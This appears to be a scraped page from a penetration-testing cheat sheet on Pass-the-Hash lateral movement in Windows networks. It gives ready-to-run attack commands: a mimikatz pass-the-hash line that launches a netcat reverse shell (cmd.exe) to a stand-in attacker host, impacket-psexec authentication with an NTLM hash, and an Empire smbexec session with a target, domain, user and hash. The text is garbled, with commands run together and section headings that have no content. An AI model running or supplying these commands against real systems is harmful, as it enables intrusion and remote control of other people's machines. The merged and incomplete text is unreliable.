Pass the Hash (PtH)
Pass-the-Hash Lateral Movement
Tools: impacket , psexec , crackmapexec/netexec , evil-winrm , xfreerdp/remmina , smbclient , mimikatz
Globally, all the Impacket tools and the ones that use the library can authenticate via Pass The Hash with the -hashes command line parameter instead of specifying the password. For ldeep, NetExec and evil-winrm, it's -H.
Interactive shell
mimikatz "privilege::debug sekurlsa::pth /user USER /domain:DOMAIN /ntlm:HASH /run:"C\tools\nc64.exe -e cmd.exe ATTACK_IP PORT"psexec.exe -AcceptEULA \\IP
impacket-psexec -hashes":HASH" USER@IPusemodule lateral_movement/invoke_smbexec(Empire: usemodule/powershell/lateral_movement/invoke_smbexec) > set ComputerName '10.10.10.100'
(Empire: usemodule/powershell/lateral_movement/invoke_smbexec) > set Domain security.local
(Empire: usemodule/powershell/lateral_movement/invoke_smbexec) > set Listener http
(Empire: usemodule/powershell/lateral_movement/invoke_smbexec) > set Hash 58a478135a93ac3bf058a5ea0e8fdb71
(Empire: usemodule/powershell/lateral_movement/invoke_smbexec) > set Username moe
(Empire: usemodule/powershell/lateral_movement/invoke_smbexec) > executeSMB Options
WMI Options
TIP: Both of these techniques give NT Authority/System shell (System/Admin access)
Pseudo-shell (File write and read) (System/Admin access)
These techniques give NT Authority/System shell
WinRM
SMB
RDP
MSSQL
EXTRACT NTLM HASHES FROM LOCAL SAM
PtH (Linux)
Last updated